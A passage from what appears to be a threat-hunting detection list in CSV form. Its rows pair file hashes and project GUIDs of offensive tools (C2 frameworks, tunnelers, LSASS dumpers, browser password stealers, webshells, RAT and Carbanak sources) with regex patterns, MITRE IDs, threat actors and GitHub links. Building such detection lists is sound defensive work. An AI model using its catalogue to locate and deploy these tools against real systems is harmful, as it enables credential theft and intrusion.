TA0010","N/A","N/A","Persistence","https://github.com/CykuTW/tsh-go","1","0","#filehash","N/A","10","2","161","16","2024-08-29T02:59:37Z","2022-06-13T16:25:30Z","30439" "*8838860eb9971c0490c4fa221b8774b95eaedd0f39ce12a94d4035eaab7a4514*",".{0,1000}8838860eb9971c0490c4fa221b8774b95eaedd0f39ce12a94d4035eaab7a4514.{0,1000}","offensive_tool_keyword","ligolo-ng","An advanced tunneling tool that uses TUN interfaces","T1572 - T1090","TA0011","N/A","Dispossessor - AvosLocker - LockBit","C2","https://github.com/nicocha30/ligolo-ng","1","0","#filehash","N/A","10","10","3380","338","2025-04-17T07:48:36Z","2021-07-28T12:55:36Z","30440" "*88391b7725953b6c37aa40ce11c2f80894ed4216f3972bef9c5738cc1771b143*",".{0,1000}88391b7725953b6c37aa40ce11c2f80894ed4216f3972bef9c5738cc1771b143.{0,1000}","offensive_tool_keyword","GlllPowerloader","Sample to bypass AV/EDR and upload to transfer.sh","T1059.001 - T1202 - T1105 - T1027 - T1036 - T1070 - T1031 - T1071 - T1048","TA0005 - TA0004 - TA0002 - TA0011 - TA0010","N/A","N/A","Defense Evasion","https://github.com/INotGreen/GlllPowerloader","1","0","#filehash","N/A","10","5","451","105","2024-04-12T07:28:24Z","2022-04-26T12:10:58Z","30441" "*8839f297dba4758e6c37d5b13f6fb47e19338798a2e4e61cef77d2423fcf7eef*",".{0,1000}8839f297dba4758e6c37d5b13f6fb47e19338798a2e4e61cef77d2423fcf7eef.{0,1000}","offensive_tool_keyword","SharpFtpC2","A Streamlined FTP-Driven Command and Control Conduit for Interconnecting Remote Systems","T1071.002 - T1105 - T1090.001","TA0011","N/A","N/A","C2","https://github.com/PhrozenIO/SharpFtpC2","1","0","#filehash","N/A","10","10","88","15","2023-11-09T10:37:20Z","2023-06-09T12:41:28Z","30442" "*883a4ec63fe55655eacd7062f2920f8b3a9bb89c8ea4ad8f9b02fd7c2f6f3069*",".{0,1000}883a4ec63fe55655eacd7062f2920f8b3a9bb89c8ea4ad8f9b02fd7c2f6f3069.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - 
TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","0","#filehash","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","30443" "*8845A8AF-34DC-4EBC-8223-B35F8CC8A900*",".{0,1000}8845A8AF\-34DC\-4EBC\-8223\-B35F8CC8A900.{0,1000}","offensive_tool_keyword","bypassUAC","UAC bypass for x64 Windows 7 - 11","T1088 - T1202 - T1112 - T1059 - T1548.002","TA0005 - TA0004","N/A","Dispossessor","Defense Evasion","https://github.com/hackerhouse-opensource/iscsicpl_bypassUAC","1","0","#GUIDproject","N/A","9","9","802","156","2022-07-27T15:48:45Z","2022-07-14T02:37:50Z","30444" "*8847bcf8ffca87a3ca02bfb7947b5ad147281350a66b25bf5b5495b2dc7c36b9*",".{0,1000}8847bcf8ffca87a3ca02bfb7947b5ad147281350a66b25bf5b5495b2dc7c36b9.{0,1000}","offensive_tool_keyword","tun2socks","socks tunneling","T1572 - T1090 - T1071 - T1573 - T1205","TA0010 - TA0011 - TA0008 - TA0005","N/A","N/A","C2","https://github.com/xjasonlyu/tun2socks","1","0","#filehash","N/A","10","10","3785","513","2025-04-15T21:19:25Z","2019-07-16T03:25:40Z","30445" "*8847d2aebb87f30333220ad16142fc49469e5451533137686cb4d2760836c3a8*",".{0,1000}8847d2aebb87f30333220ad16142fc49469e5451533137686cb4d2760836c3a8.{0,1000}","offensive_tool_keyword","PhpSploit","Full-featured C2 framework which silently persists on webserver via evil PHP oneliner","T1505.003 - T1505 - T1059 - T1219 - T1547","TA0003 - TA0011 - TA0005","N/A","N/A","C2","https://github.com/nil0x42/phpsploit","1","0","#filehash","N/A","10","10","2331","453","2024-05-06T13:49:14Z","2014-05-21T19:43:03Z","30446" "*884e9a4943a42933a5e1413349872ed3f48140a58f442a43615e8778d8656d89*",".{0,1000}884e9a4943a42933a5e1413349872ed3f48140a58f442a43615e8778d8656d89.{0,1000}","offensive_tool_keyword","BloodHound","Use Invoke-BloodHound from SharpHound.ps1 or use SharpHound.exe. Both can be run reflectively. 
Examples below use the PowerShell variant but arguments are identical.","T1482 - T1087 - T1069 - T1018","TA0007 - TA0008 - TA0004","N/A","APT29 - MAZE - LockBit - Conti - XingLocker - Revil - Hive - Black Basta - Wizard Spider - TA2101 - TRAVELING SPIDER - Chimera - TA505 - APT20 - COZY BEAR - EMBER BEAR - Dispossessor","Discovery","https://github.com/BloodHoundAD/BloodHound/tree/master/Collectors","1","0","#filehash","N/A","10","10","10146","1759","2025-04-02T15:56:30Z","2016-04-17T18:36:14Z","30449" "*88552e15e5ce836e9f7f1b12b55ca6b3805641d577fb71663d2c8fc5fb96ce47*",".{0,1000}88552e15e5ce836e9f7f1b12b55ca6b3805641d577fb71663d2c8fc5fb96ce47.{0,1000}","offensive_tool_keyword","gsocket","The Global Socket Tookit allows two users behind NAT/Firewall to establish a TCP connection with each other. Securely.","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/hackerschoice/gsocket","1","0","#filehash","N/A","10","10","1671","142","2025-04-22T14:47:29Z","2020-09-18T16:14:22Z","30450" "*8857efba9865de5690af4a3559f4839286cd2083f752ba93c30bd969c6636170*",".{0,1000}8857efba9865de5690af4a3559f4839286cd2083f752ba93c30bd969c6636170.{0,1000}","offensive_tool_keyword","gsocket","The Global Socket Tookit allows two users behind NAT/Firewall to establish a TCP connection with each other. 
Securely.","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/hackerschoice/gsocket","1","0","#filehash","N/A","10","10","1671","142","2025-04-22T14:47:29Z","2020-09-18T16:14:22Z","30451" "*885a208a7a8ea9e37a44cef5ec2d8ee8ec7240e97b7ee7b9bda5dbf03553bf75*",".{0,1000}885a208a7a8ea9e37a44cef5ec2d8ee8ec7240e97b7ee7b9bda5dbf03553bf75.{0,1000}","offensive_tool_keyword","RunasCs","RunasCs - Csharp and open version of windows builtin runas.exe","T1059.003 - T1059.001 - T1035","TA0002 - TA0004","N/A","N/A","Defense Evasion","https://github.com/antonioCoco/RunasCs","1","0","#filehash","N/A","7","10","1159","141","2024-07-12T23:31:35Z","2019-08-08T20:18:18Z","30452" "*88607a2ed607b9c44dbfe49dec1ec78d963c055fd8a9153bfaa0a8ce3a90b37c*",".{0,1000}88607a2ed607b9c44dbfe49dec1ec78d963c055fd8a9153bfaa0a8ce3a90b37c.{0,1000}","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1110 - T1135 - T1047 - T1078 - T1087 - T1021","TA0006 - TA0007 - TA0003 - TA0008 - TA0005","N/A","N/A","Exploitation tool","https://github.com/Pennyw0rth/NetExec","1","0","#filehash","N/A","10","10","4066","459","2025-04-20T00:08:29Z","2023-09-08T15:36:00Z","30453" "*8861dd060f4b09113d6b8b10c213472d0ac3fe0f654724ec90fb5398ddf890e3*",".{0,1000}8861dd060f4b09113d6b8b10c213472d0ac3fe0f654724ec90fb5398ddf890e3.{0,1000}","offensive_tool_keyword","CDK","CDK is an open-sourced container penetration toolkit","T1610 - T1611 - T1203 - T1059.004 - T1564.004","TA0001 - TA0002 - TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/cdk-team/CDK","1","0","#linux #filehash","N/A","9","10","4164","566","2025-03-08T14:00:06Z","2020-11-05T09:18:51Z","30454" "*88689c44114bf5819480752db5e955f0e74a2141d3f4b59f7030203eb2fb458d*",".{0,1000}88689c44114bf5819480752db5e955f0e74a2141d3f4b59f7030203eb2fb458d.{0,1000}","offensive_tool_keyword","ligolo-ng","An advanced tunneling tool that uses TUN 
interfaces","T1572 - T1090","TA0011","N/A","Dispossessor - AvosLocker - LockBit","C2","https://github.com/nicocha30/ligolo-ng","1","0","#filehash","N/A","10","10","3380","338","2025-04-17T07:48:36Z","2021-07-28T12:55:36Z","30455" "*886913aabc03e8863c9fa20034054a2fc289c8bfa838e5481d5d7e90e1d043a0*",".{0,1000}886913aabc03e8863c9fa20034054a2fc289c8bfa838e5481d5d7e90e1d043a0.{0,1000}","offensive_tool_keyword","windows-defender-remover","hacktool used to remove Windows Defender","T1089 - T1562.001 - T1562.004","TA0005 - TA0040","N/A","Black Basta","Defense Evasion","https://github.com/ionuttbara/windows-defender-remover","1","0","#filehash","N/A","10","10","5266","354","2025-02-13T20:21:07Z","2021-08-13T20:44:46Z","30456" "*886c0eac43136acee5b85b22c72965d63faf9b9f70ed28deca9c3b028b22dee8*",".{0,1000}886c0eac43136acee5b85b22c72965d63faf9b9f70ed28deca9c3b028b22dee8.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","BlackSuit - Royal - AvosLocker - Cactus - Yanluowang - Sandworm - KNOTWEED","C2","https://github.com/jpillora/chisel","1","0","#filehash #linux #windows","N/A","10","10","14432","1466","2024-09-28T23:35:13Z","2015-02-25T11:42:50Z","30458" "*886C26DC-0073-4BB7-823B-2B9DAD53DB8B*",".{0,1000}886C26DC\-0073\-4BB7\-823B\-2B9DAD53DB8B.{0,1000}","offensive_tool_keyword","Carbanak","remote backdoor used by a group of the same name (Carbanak). 
It is intended for espionage - data exfiltration and providing remote access to infected machines","T1021.002 - T1071.001 - T1105 - T1059 - T1003 - T1078 - T1041","TA0006 - TA0008 - TA0010 - TA0011","Carbanak","FIN7 - Carbanak","Malware","https://github.com/0x25bit/Updated-Carbanak-Source-with-Plugins","1","0","#GUIDproject","N/A","10","4","396","223","2019-05-01T23:31:35Z","2019-04-22T21:01:08Z","30459" "*886ce8cf3c9c8a6e8a4db1c3286151c9af6a3fbe7269a5df5269d9ffa6a8c992*",".{0,1000}886ce8cf3c9c8a6e8a4db1c3286151c9af6a3fbe7269a5df5269d9ffa6a8c992.{0,1000}","offensive_tool_keyword","taowu-cobalt-strike","Collection of hacktools binaries","T1003 - T1059 - T1087 - T1110 - T1135 - T1047 - T1078 - T1086 - T1098 - T1212 - T1021 - T1056 - T1071 - T1210 - T1484 - T1555 - T1055 - T1005 - T1090 - T1080 - T1204 - T1496 - T1114 - T1562 - T1482 - T1505 - T1548 - T1560 - T1566 - T1218 - T1547 - T1070 - T1206 - T1208","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011","N/A","N/A","Exploitation tool","https://github.com/pandasec888/taowu-cobalt_strike/tree/312fec79b3413ecfc06bc43efccfcbc1383a3566","1","0","#filehash","N/A","10","10","1797","330","2023-10-31T09:13:10Z","2020-07-05T10:13:00Z","30460" "*886de66b761338d87027254c40da3ea0fd9072fc301c1b8fdd2e4d652e231dea*",".{0,1000}886de66b761338d87027254c40da3ea0fd9072fc301c1b8fdd2e4d652e231dea.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. 
fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","0","#filehash","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","30461" "*8879933fd0c682fa48bfa79023b5730f6ee8e984e8cde1b275a64b098473e424*",".{0,1000}8879933fd0c682fa48bfa79023b5730f6ee8e984e8cde1b275a64b098473e424.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","AvosLocker - APT29 - Cinnamon Tempest - GOLD CABIN - COZY BEAR - Black Basta","C2","https://github.com/BishopFox/sliver","1","0","#filehash","N/A","10","10","9218","1249","2025-04-21T17:52:43Z","2019-01-17T22:07:38Z","30464" "*887e0ff0707e46e7f309f6e12eaddd4161b6b3aa88a705857ac55590cdc4c64a*",".{0,1000}887e0ff0707e46e7f309f6e12eaddd4161b6b3aa88a705857ac55590cdc4c64a.{0,1000}","offensive_tool_keyword","LsassSilentProcessExit","Command line interface to dump LSASS memory to disk via SilentProcessExit","T1003.001 - T1059.003","TA0006 - TA0002","N/A","N/A","Credential Access","https://github.com/deepinstinct/LsassSilentProcessExit","1","0","#filehash","N/A","10","5","445","61","2020-12-23T11:51:21Z","2020-11-29T08:49:42Z","30467" 
"*8880e4d7caf33e5da9a785d4c2da5bdcc6ba6315f882900f88c0adf1872e8fb8*",".{0,1000}8880e4d7caf33e5da9a785d4c2da5bdcc6ba6315f882900f88c0adf1872e8fb8.{0,1000}","offensive_tool_keyword","CDK","CDK is an open-sourced container penetration toolkit","T1610 - T1611 - T1203 - T1059.004 - T1564.004","TA0001 - TA0002 - TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/cdk-team/CDK","1","0","#linux #filehash","N/A","9","10","4164","566","2025-03-08T14:00:06Z","2020-11-05T09:18:51Z","30468" "*88828@PROTONMAIL.CH*",".{0,1000}88828\@PROTONMAIL\.CH.{0,1000}","offensive_tool_keyword","ransomware_notes","detection patterns retrieved in ransomware notes archives","T1486","TA0040","N/A","N/A","Ransomware","https://github.com/threatlabz/ransomware_notes","1","0","#email","N/A","10","4","354","55","2025-04-04T19:06:04Z","2022-08-01T15:14:59Z","30469" "*8883c36d251e050a0e232a171024b166f8ab5b4efa0f455fd987560fed85d175*",".{0,1000}8883c36d251e050a0e232a171024b166f8ab5b4efa0f455fd987560fed85d175.{0,1000}","offensive_tool_keyword","tun2socks","socks tunneling","T1572 - T1090 - T1071 - T1573 - T1205","TA0010 - TA0011 - TA0008 - TA0005","N/A","N/A","C2","https://github.com/xjasonlyu/tun2socks","1","0","#filehash","N/A","10","10","3785","513","2025-04-15T21:19:25Z","2019-07-16T03:25:40Z","30470" "*8886b069180a096d54b6d6555aa3a5b8c44359eb858a072f6e34943fe40b1fdf*",".{0,1000}8886b069180a096d54b6d6555aa3a5b8c44359eb858a072f6e34943fe40b1fdf.{0,1000}","offensive_tool_keyword","Eventlogedit-evtx--Evolution","","T1070.001 - T1564.001","TA0005","N/A","N/A","Defense Evasion","https://github.com/3gstudent/Eventlogedit-evtx--Evolution","1","0","#filehash","N/A","9","3","267","62","2021-04-17T01:28:00Z","2018-06-05T01:21:20Z","30471" "*88888dcb2ac77d09b3c68c26f025f1e1ba9db667f3950a79a110896de297e162*",".{0,1000}88888dcb2ac77d09b3c68c26f025f1e1ba9db667f3950a79a110896de297e162.{0,1000}","offensive_tool_keyword","SafetyDump","in memory process dumper - uses the Minidump Windows API to dump 
process memory before base64 encoding that dump and writing it to standard output","T1003.005 - T1059.001 - T1105 - T1071.001","TA0005 - TA0006 - TA0010","N/A","N/A","Credential Access","https://github.com/riskydissonance/SafetyDump","1","0","#filehash","N/A","10","2","162","16","2020-10-29T16:25:04Z","2019-12-10T14:45:17Z","30472" "*888e7d4c8b99cb78ebd6a9a93d74b768c0f66ca210dbb9a3705d7636b609788b*",".{0,1000}888e7d4c8b99cb78ebd6a9a93d74b768c0f66ca210dbb9a3705d7636b609788b.{0,1000}","offensive_tool_keyword","BloodHound","Use Invoke-BloodHound from SharpHound.ps1 or use SharpHound.exe. Both can be run reflectively. Examples below use the PowerShell variant but arguments are identical.","T1482 - T1087 - T1069 - T1018","TA0007 - TA0008 - TA0004","N/A","APT29 - MAZE - LockBit - Conti - XingLocker - Revil - Hive - Black Basta - Wizard Spider - TA2101 - TRAVELING SPIDER - Chimera - TA505 - APT20 - COZY BEAR - EMBER BEAR - Dispossessor","Discovery","https://github.com/BloodHoundAD/BloodHound/tree/master/Collectors","1","0","#filehash","N/A","10","10","10146","1759","2025-04-02T15:56:30Z","2016-04-17T18:36:14Z","30473" "*8897b01cd05406b33c497bd06f9bd278726ae9812352caecdbc8528dd630eb5e*",".{0,1000}8897b01cd05406b33c497bd06f9bd278726ae9812352caecdbc8528dd630eb5e.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","0","#filehash","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","30475" "*8898af517b30c917a82e087530e829ec5d46a5dd43759fb66202e3945a380aa5*",".{0,1000}8898af517b30c917a82e087530e829ec5d46a5dd43759fb66202e3945a380aa5.{0,1000}","offensive_tool_keyword","rotateproxy","A tool that uses fofa to search for socks5 open proxies and perform proxy pool rotation","T1071.001 - T1090 - T1095 - T1189","TA0011 - TA0010 - TA0005","N/A","N/A","Defense 
Evasion","https://github.com/akkuman/rotateproxy","1","0","#filehash","N/A","10","9","800","135","2024-01-24T05:47:37Z","2021-10-18T02:10:27Z","30476" "*8898f5cd09c750f7c2c1718688eef375d659c00e9a2c98b96b3f450ac294b82f*",".{0,1000}8898f5cd09c750f7c2c1718688eef375d659c00e9a2c98b96b3f450ac294b82f.{0,1000}","offensive_tool_keyword","Malware RAT collection","from Malware RAT samples","T1105 - T1059 - T1109 - T1016 - T1071.001 - T1082 - T1027 - T1083 - T1056 - T1106 - T1078 - T1053","TA0011 - TA0009 - TA0006 - TA0003 - TA0002 - TA0005 - TA0007","N/A","N/A","Malware","https://github.com/x-cod3r/Remote-administration-tools-archive","1","0","#filehash","N/A","9","1","93","30","2023-10-03T15:08:22Z","2023-10-03T13:09:00Z","30477" "*889a7d961d4e847d37d3019ccd1625a335d2e2d18c6fb1ec1d41aa4df679f553*",".{0,1000}889a7d961d4e847d37d3019ccd1625a335d2e2d18c6fb1ec1d41aa4df679f553.{0,1000}","offensive_tool_keyword","HackBrowserData","Decrypt passwords/cookies/history/bookmarks from the browser","T1555.003 - T1552.001","TA0006 - TA0009 - TA0010","N/A","N/A","Credential Access","https://github.com/moonD4rk/HackBrowserData","1","0","#filehash","N/A","N/A","10","12216","1656","2025-04-06T01:32:13Z","2020-06-18T03:24:31Z","30478" "*889b051531cf8ec665b0f1730e4ed69e70949341166ff531d703f9e5b8f448ce*",".{0,1000}889b051531cf8ec665b0f1730e4ed69e70949341166ff531d703f9e5b8f448ce.{0,1000}","offensive_tool_keyword","nps","chinese intranet penetration proxy server","T1090 - T1071 - T1102 - T1075 - T1133","TA0002 - TA0011 - TA0010","N/A","N/A","Defense Evasion","https://github.com/yisier/nps","1","0","#filehash","N/A","9","10","2674","327","2025-04-17T09:43:50Z","2022-09-14T06:24:00Z","30479" "*889dc7cce75cae74fe761345fc1f0e02e8b97f705c92a5a136666250301a1215*",".{0,1000}889dc7cce75cae74fe761345fc1f0e02e8b97f705c92a5a136666250301a1215.{0,1000}","offensive_tool_keyword","RottenPotatoNG","perform the RottenPotato attack and get a handle to a privileged token","T1134.001 - T1055.012 - 
T1547.001","TA0004","N/A","Sandworm","Privilege Escalation","https://github.com/breenmachine/RottenPotatoNG","1","0","#filehash","N/A","8","10","935","183","2017-12-29T14:38:47Z","2017-12-29T13:19:03Z","30480" "*889dc7cce75cae74fe761345fc1f0e02e8b97f705c92a5a136666250301a1215*",".{0,1000}889dc7cce75cae74fe761345fc1f0e02e8b97f705c92a5a136666250301a1215.{0,1000}","offensive_tool_keyword","RottenPotatoNG","perform the RottenPotato attack and get a handle to a privileged token","T1134.001 - T1055.012 - T1547.001","TA0004","N/A","Sandworm","Privilege Escalation","https://github.com/breenmachine/RottenPotatoNG","1","0","#filehash","N/A","8","10","935","183","2017-12-29T14:38:47Z","2017-12-29T13:19:03Z","30481" "*889E3D8B-58FA-462D-A2D8-3CB430484B6A*",".{0,1000}889E3D8B\-58FA\-462D\-A2D8\-3CB430484B6A.{0,1000}","offensive_tool_keyword","nsocks",".NET HttpClient proxy handler implementation for SOCKS proxies","T1090 - T1571 - T1071 - T1095","TA0011 - TA0001 - TA0008","N/A","Scattered Spider* - Black Basta","C2","https://github.com/bbepis/Nsocks","1","0","#GUIDproject","N/A","8","10","3","0","2020-06-08T17:25:07Z","2020-03-28T09:00:22Z","30482" "*88a56a39fa828dee79620714e53285c2c5bfbec814e64ab150d8795b0d78940c*",".{0,1000}88a56a39fa828dee79620714e53285c2c5bfbec814e64ab150d8795b0d78940c.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. 
fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","0","#filehash","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","30483" "*88B40068-B3DB-4C2F-86F9-8EADC52CFE58*",".{0,1000}88B40068\-B3DB\-4C2F\-86F9\-8EADC52CFE58.{0,1000}","offensive_tool_keyword","Jomungand","Shellcode Loader with memory evasion","T1055.012 - T1027.002 - T1564.006","TA0005 - TA0042","N/A","N/A","Defense Evasion","https://github.com/RtlDallas/Jomungand","1","0","#GUIDproject","N/A","10","","N/A","","","","30484" "*88b61c15b152274439f7639dbbeca8839b6ca20e52599cd6e1493a3e3533668f*",".{0,1000}88b61c15b152274439f7639dbbeca8839b6ca20e52599cd6e1493a3e3533668f.{0,1000}","offensive_tool_keyword","precompiled-binaries","executables for penetration testing Windows Active Directory environments","T1016 - T1046 - T1087 - T1082 - T1055 - T1068 - T1083 - T1012 - T1558 - T1097 - T1077 - T1134 - T1550 - T1078 - T1021 - T1072 - T1484 - T1553 - T1557 - T1003 - T1555 - T1134 - T1055 - T1088","TA0007 - TA0008 - TA0004 - TA0006 - TA0002 - TA0005","N/A","N/A","Exploitation tool","https://github.com/jakobfriedl/precompiled-binaries","1","0","#filehash","N/A","10","2","138","38","2025-03-06T13:02:11Z","2023-08-08T12:21:46Z","30485" "*88babbe96838fcad9b486bd36f4bce32d242848ab4aa71c739fd6338dea37a68*",".{0,1000}88babbe96838fcad9b486bd36f4bce32d242848ab4aa71c739fd6338dea37a68.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - 
TA0011","N/A","BlackSuit - Royal - AvosLocker - Cactus - Yanluowang - Sandworm - KNOTWEED","C2","https://github.com/jpillora/chisel","1","0","#filehash #linux #windows","N/A","10","10","14432","1466","2024-09-28T23:35:13Z","2015-02-25T11:42:50Z","30486" "*88c940e5e4e3728a9433887cfd7eb308d8d4e5e24f5ab49b3c13dcc595da89d0*",".{0,1000}88c940e5e4e3728a9433887cfd7eb308d8d4e5e24f5ab49b3c13dcc595da89d0.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","0","#filehash","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","30488" "*88ccca47d7e7529c4c1c3abe61dce761d10fcea8a06b7234ed1b5f63fbf3c710*",".{0,1000}88ccca47d7e7529c4c1c3abe61dce761d10fcea8a06b7234ed1b5f63fbf3c710.{0,1000}","offensive_tool_keyword","Malware RAT collection","from Malware RAT samples","T1105 - T1059 - T1109 - T1016 - T1071.001 - T1082 - T1027 - T1083 - T1056 - T1106 - T1078 - T1053","TA0011 - TA0009 - TA0006 - TA0003 - TA0002 - TA0005 - TA0007","N/A","N/A","Malware","https://github.com/x-cod3r/Remote-administration-tools-archive","1","0","#filehash","N/A","9","1","93","30","2023-10-03T15:08:22Z","2023-10-03T13:09:00Z","30489" "*88dc61a50afafe0e0ffff60913d45f2abe2a298c2c8a067fc7044e7251eb9012*",".{0,1000}88dc61a50afafe0e0ffff60913d45f2abe2a298c2c8a067fc7044e7251eb9012.{0,1000}","offensive_tool_keyword","fakelogonscreen","Fake Windows logon screen to steal passwords","T1056.002 - T1078 - T1110 - 
T1555","TA0006 - TA0003 - TA0009","N/A","N/A","Credential Access","https://github.com/bitsadmin/fakelogonscreen","1","0","#filehash","N/A","10","10","1325","236","2020-02-03T23:28:01Z","2020-02-01T18:51:35Z","30491" "*88e13a123b49e19188a4d51b83b060fd5fe0d6b4cdd96e6557792d229d339f64*",".{0,1000}88e13a123b49e19188a4d51b83b060fd5fe0d6b4cdd96e6557792d229d339f64.{0,1000}","offensive_tool_keyword","BloodHound","Use Invoke-BloodHound from SharpHound.ps1 or use SharpHound.exe. Both can be run reflectively. Examples below use the PowerShell variant but arguments are identical.","T1482 - T1087 - T1069 - T1018","TA0007 - TA0008 - TA0004","N/A","APT29 - MAZE - LockBit - Conti - XingLocker - Revil - Hive - Black Basta - Wizard Spider - TA2101 - TRAVELING SPIDER - Chimera - TA505 - APT20 - COZY BEAR - EMBER BEAR - Dispossessor","Discovery","https://github.com/BloodHoundAD/BloodHound/tree/master/Collectors","1","0","#filehash","N/A","10","10","10146","1759","2025-04-02T15:56:30Z","2016-04-17T18:36:14Z","30493" "*88e3cee91cfda389858ecd70bf3f9b8e45ce7d41761cb7b13075e8d003724007*",".{0,1000}88e3cee91cfda389858ecd70bf3f9b8e45ce7d41761cb7b13075e8d003724007.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. 
fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","0","#filehash","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","30495" "*88e73ed9922003522ffe4b79167dc818716adc62dc6c739f6c7422ae209bd233*",".{0,1000}88e73ed9922003522ffe4b79167dc818716adc62dc6c739f6c7422ae209bd233.{0,1000}","offensive_tool_keyword","BloodHound","Use Invoke-BloodHound from SharpHound.ps1 or use SharpHound.exe. Both can be run reflectively. Examples below use the PowerShell variant but arguments are identical.","T1482 - T1087 - T1069 - T1018","TA0007 - TA0008 - TA0004","N/A","APT29 - MAZE - LockBit - Conti - XingLocker - Revil - Hive - Black Basta - Wizard Spider - TA2101 - TRAVELING SPIDER - Chimera - TA505 - APT20 - COZY BEAR - EMBER BEAR - Dispossessor","Discovery","https://github.com/BloodHoundAD/BloodHound/tree/master/Collectors","1","0","#filehash","N/A","10","10","10146","1759","2025-04-02T15:56:30Z","2016-04-17T18:36:14Z","30496" "*88f176c26ca3b46abea5d783cb01e82eb4c9ce1da3f0184a3994a01e04679934*",".{0,1000}88f176c26ca3b46abea5d783cb01e82eb4c9ce1da3f0184a3994a01e04679934.{0,1000}","offensive_tool_keyword","PEASS-ng","PEASS-ng - Privilege Escalation Awesome Scripts suite","T1098","TA0004 - TA0005","N/A","Scattered Spider* - PLAY - EMBER BEAR - COZY BEAR - Dispossessor","Privilege Escalation","https://github.com/peass-ng/PEASS-ng","1","0","#filehash","N/A","10","10","17347","3209","2025-04-01T04:29:00Z","2019-01-13T19:58:24Z","30498" 
"*88f333f2f21ca05e44a91c376022997c2bbec79b9d9982d59ee6d38183df86f3*",".{0,1000}88f333f2f21ca05e44a91c376022997c2bbec79b9d9982d59ee6d38183df86f3.{0,1000}","offensive_tool_keyword","clickjack","automate abuse of clickonce applications","T1210 - T1204 - T1071.001","TA0001 - TA0002 - TA0005","N/A","N/A","Phishing","https://github.com/trustedsec/The_Shelf","1","0","#filehash","N/A","10","3","247","14","2024-11-25T19:33:34Z","2024-05-22T14:31:52Z","30499" "*88f826096be1ed1be32dd45dc2381189df7c5f349c7b808edb872e68be4a9350*",".{0,1000}88f826096be1ed1be32dd45dc2381189df7c5f349c7b808edb872e68be4a9350.{0,1000}","offensive_tool_keyword","RunasCs","RunasCs - Csharp and open version of windows builtin runas.exe","T1059.003 - T1059.001 - T1035","TA0002 - TA0004","N/A","N/A","Defense 